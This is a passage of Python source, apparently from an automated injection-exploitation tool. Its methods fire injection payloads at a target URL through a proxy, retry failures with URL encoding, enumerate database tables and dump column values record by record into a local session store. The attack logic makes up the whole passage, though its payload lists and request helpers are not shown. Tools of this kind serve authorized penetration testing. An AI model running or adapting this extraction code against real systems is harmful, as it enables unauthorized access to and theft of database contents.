def _fallback_check(self, payload, count, unknown_error_counter=0):
PayloadResponse = collections.namedtuple(
"PayloadResponse",
[
"is_injected",
"status_code",
"result",
"payload",
"payloads_count",
"error",
],
)
status_code = None
error = None
logger.payload(f"{payload}")
payload_request = prepare_payload_request(
self, payload, unknown_error_counter=unknown_error_counter)
url = payload_request.url
data = payload_request.data
regex = payload_request.regex
headers = payload_request.headers
try:
response = request.inject_payload(url=url,
regex=regex,
data=data,
headers=headers,
proxy=self._proxy)
if response.ok:
result = response.result
status_code = response.status_code
error = response.error
return PayloadResponse(
is_injected=True,
status_code=status_code,
result=result,
payload=payload,
payloads_count=count,
error=error,
)
else:
status_code = response.status_code
error = response.error
except KeyboardInterrupt:
logger.error("user interrupted")
logger.end("ending")
exit(0)
return PayloadResponse(
is_injected=False,
status_code=status_code,
result="",
payload="",
payloads_count=count,
error=error,
)
def _extract_tbls(self, payloads, database=""):
_temp, index = [], 0
Response = collections.namedtuple("Response", ["is_fetched", "result"])
while index < len(payloads):
payload = payloads[index]
payload_request = prepare_payload_request(self, payload)
url = payload_request.url
data = payload_request.data
regex = payload_request.regex
headers = payload_request.headers
try:
response = request.inject_payload(url=url,
regex=regex,
data=data,
headers=headers,
proxy=self._proxy)
except KeyboardInterrupt:
logger.warning(
"user aborted during enumeration. Xpath will display partial output"
)
break
else:
if response.ok:
result = response.result
logger.info("retrieved: '%s'" % (result))
_temp.append(result)
retval = session.dump(
session_filepath=self.session_filepath,
query=TBLS_STATEMENT.format(tbl_name=database,
tblname=result),
)
index += 1
if _temp and len(_temp) > 0:
_temp = list(set(_temp))
resp = Response(is_fetched=True, result=_temp)
else:
resp = Response(is_fetched=True, result=_temp)
return resp
def _extract_data(self,
payloads,
table=None,
columns=None,
fetched_records=None,
count=None):
_temp, is_interrupted = [], False
Response = collections.namedtuple("Response", ["is_fetched", "result"])
for index, values in payloads.items():
__temp = [] if not fetched_records else fetched_records
position = 0
while position < len(values):
p = values[position]
name = p.get("column")
payload = p.get("payload")
payload_request = prepare_payload_request(self, payload)
url = payload_request.url
data = payload_request.data
regex = payload_request.regex
headers = payload_request.headers
try:
response = request.inject_payload(
url=url,
regex=regex,
data=data,
headers=headers,
proxy=self._proxy,
)
except KeyboardInterrupt:
logger.warning(
"user aborted during enumeration. Xpath will display partial output"
)
is_interrupted = True
break
else:
if response.ok:
result = response.result
logger.info(
"retrieved: '%s'" %
(result if result != "<blank_value>" else ""))
_temp.append({
"index": index + 1,
"column_name": name,
"column_value": result,
})
__temp.append(result)
table_name = f"{count}_{table}_tmp"
PREPARED_STATEMENT = f"INSERT INTO `{table_name}` (`index`, `column_name`, `column_value`) VALUES (?, ?, ?);"
retval = session.dump(
session_filepath=self.session_filepath,
query=PREPARED_STATEMENT,
values=(index + 1, name, result),
)
position += 1
_ = self._save_records(table=table,
column_names=columns,
records=__temp,
count=count)
if is_interrupted:
break
if _temp and len(_temp) > 0:
resp = Response(is_fetched=True, result=_temp)
else:
resp = Response(is_fetched=False, result=_temp)
return resp
def _extact(self, payloads):
PayloadResponse = collections.namedtuple(
"PayloadResponse",
[
"is_injected",
"status_code",
"result",
"payload",
"payloads_count",
"error",
],
)
payloads_count = len(payloads)
status_code = None
error = None
unknown_error_counter = 0
for payload in payloads:
logger.payload(f"{payload}")
payload_request = prepare_payload_request(self, payload)
url = payload_request.url
data = payload_request.data
regex = payload_request.regex
headers = payload_request.headers
try:
response = request.inject_payload(url=url,
regex=regex,
data=data,
headers=headers,
proxy=self._proxy)
except KeyboardInterrupt:
logger.error("user interrupted")
logger.end("ending")
exit(0)
except:
unknown_error_counter += 1
logger.debug(
"trying again the same payload with url encoding..")
resp = self._fallback_check(
payload,
payloads_count,
unknown_error_counter=unknown_error_counter)
if resp.is_injected:
return resp
else:
if response.ok:
result = response.result
status_code = response.status_code
error = response.error
return PayloadResponse(
is_injected=True,
status_code=status_code,
result=result,
payload=payload,
payloads_count=payloads_count,
error=error,
)
else:
status_code = response.status_code
error = response.error
return PayloadResponse(
is_injected=False,
status_code=status_code,
result="",
payload="",
payloads_count=payloads_count,
error=error,
)